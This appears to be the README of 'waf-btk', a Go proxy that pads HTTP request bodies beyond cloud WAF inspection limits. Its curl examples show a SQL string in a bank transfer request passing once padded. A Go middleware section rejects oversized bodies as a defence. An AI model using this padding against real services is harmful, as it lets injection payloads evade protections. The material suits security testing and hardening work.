waf-btk

Published: Oct 9, 2023 License: MIT Imports: 11 Imported by: 0

WAF Bypass Toolkit

What does it do?

It is well documented that certain cloud provider WAF products have a payload size limitation. This project is an HTTP/HTTPS proxy that acts as a wrapper to evade WAF detection by padding request bodies enough to bypass inspection by those rules.

Limits

Provider        Max payload inspected
AWS WAF         8k
Cloudflare      128k
Google Armor    8k
Azure WAF       128k

How to use it

Start the proxy
make run
2023/04/24 17:17:15 [info] start listening to 127.0.0.1:8888
...
Set a custom request header

To pad a request on the fly, set the waf-btk-padding header to the size you want to pad to. The header will be stripped from the request.

The following example assumes you have an application protected by a WAF with a rule that blocks requests containing SELECT * FROM in the payload.

Example (blocked by WAF):

Replay a normal application/json request through the proxy.

$ curl -k -x http://localhost:8888 'https://api.ghostbank.com/api/v3/transfer' \
  -H 'authority: api.ghostbank.com' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json' \
  -H 'cookie: ghostbank=MTY4MTk4NzQ5M...Oj4UoQKVK1U=' \
  -H 'origin: https://ghostbank.com' \
  -H 'referer: https://ghostbank.com/' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' \
  --data-raw '{"account_to":102,"account_from":998,"amount":7,"query":"SELECT * FROM schema"}' \
  --compressed

{"error":"WAF block"}

Example (not blocked by WAF):

Specify the waf-btk-padding header; its value is the target body size in multiples of 1K. To bypass the AWS WAF, use a value of 8 or greater. To bypass the Cloudflare WAF, use a value of 128 or greater.

$ curl -k -x http://localhost:8888 'https://api.ghostbank.com/api/v3/transfer' \
  -H 'authority: api.ghostbank.com' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'content-type: application/json' \
  -H 'waf-btk-padding: 8' \
  -H 'cookie: ghostbank=MTY4MTk4NzQ5M...Oj4UoQKVK1U=' \
  -H 'origin: https://ghostbank.com' \
  -H 'referer: https://ghostbank.com/' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' \
  --data-raw '{"account_to":102,"account_from":998,"amount":7,"query":"SELECT * FROM schema"}' \
  --compressed

{"status":"ok"}

How to prevent bypass

The simplest defense against request padding bypass is to block or drop any request whose body exceeds the WAF's inspection size limit, so that nothing larger than what the WAF fully inspects ever reaches the application. However, this is not always possible or practical.
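The following is an added example of the block/drop mitigation described above, written as a Go net/http middleware; it is not part of the waf-btk project. It assumes an 8 KiB inspection limit (the AWS WAF / Google Armor figure from the table; substitute your provider's value), and the /api/v3/transfer path and transferHandler are placeholders standing in for a real application endpoint. Both the declared-length case (Content-Length already too large) and the streamed case (chunked or misreported length) are answered with 413 before the application sees the body.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"log"
	"net/http"
)

// wafInspectLimit is the largest request body the upstream WAF fully inspects.
// 8 KiB is the AWS WAF / Google Armor figure from the README table (assumption:
// adjust to your own provider). Bodies above it are dropped at the application
// edge so a padded request cannot slip past WAF inspection and still be served.
const wafInspectLimit int64 = 8 * 1024

// newSizeGuard wraps next so that any request whose body exceeds limit is
// answered with 413 and never reaches the application handler. Two cases:
//   - Content-Length is present and already too large: reject before reading.
//   - Content-Length is absent (chunked) or understated: cap the body reader so
//     the handler gets a *http.MaxBytesError as soon as the limit is crossed.
func newSizeGuard(limit int64, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.ContentLength > limit {
			log.Printf("[warn] rejected %s %s: declared body %d bytes exceeds inspection limit %d",
				r.Method, r.URL.Path, r.ContentLength, limit)
			http.Error(w, "request body too large", http.StatusRequestEntityTooLarge)
			return
		}
		r.Body = http.MaxBytesReader(w, r.Body, limit)
		next.ServeHTTP(w, r)
	})
}

// readBody reads the whole body and reports whether the guard cut it off.
// Handlers behind newSizeGuard use it so a streamed oversized body also becomes
// a logged 413 instead of an unexplained read error.
func readBody(w http.ResponseWriter, r *http.Request) ([]byte, bool) {
	body, err := io.ReadAll(r.Body)
	if err != nil {
		var tooBig *http.MaxBytesError
		if errors.As(err, &tooBig) {
			log.Printf("[warn] rejected %s %s: body exceeded inspection limit %d while streaming",
				r.Method, r.URL.Path, tooBig.Limit)
			http.Error(w, "request body too large", http.StatusRequestEntityTooLarge)
		} else {
			http.Error(w, "bad request", http.StatusBadRequest)
		}
		return nil, false
	}
	return body, true
}

// transferHandler is a placeholder application endpoint; it only reports how
// many body bytes it accepted.
func transferHandler(w http.ResponseWriter, r *http.Request) {
	body, ok := readBody(w, r)
	if !ok {
		return
	}
	w.Header().Set("Content-Type", "application/json")
	fmt.Fprintf(w, `{"status":"ok","bytes":%d}`, len(body))
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/v3/transfer", transferHandler)
	log.Printf("[info] listening on 127.0.0.1:8080 with body limit %d bytes", wafInspectLimit)
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", newSizeGuard(wafInspectLimit, mux)))
}
```

The Content-Length fast path is cheap, but it is not sufficient on its own: a client can omit the header (chunked transfer) or understate it, which is why the reader is also capped with http.MaxBytesReader. The warn-level log lines give the SOC a signal to alert on, since legitimate clients of a JSON API rarely send bodies near the limit.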

What's next?

Some WAFs (including AWS WAF) also have limitations on the number of headers and cookies they will evaluate. Future updates to WAF-BTK will extend the padding functionality to headers and cookies as well.
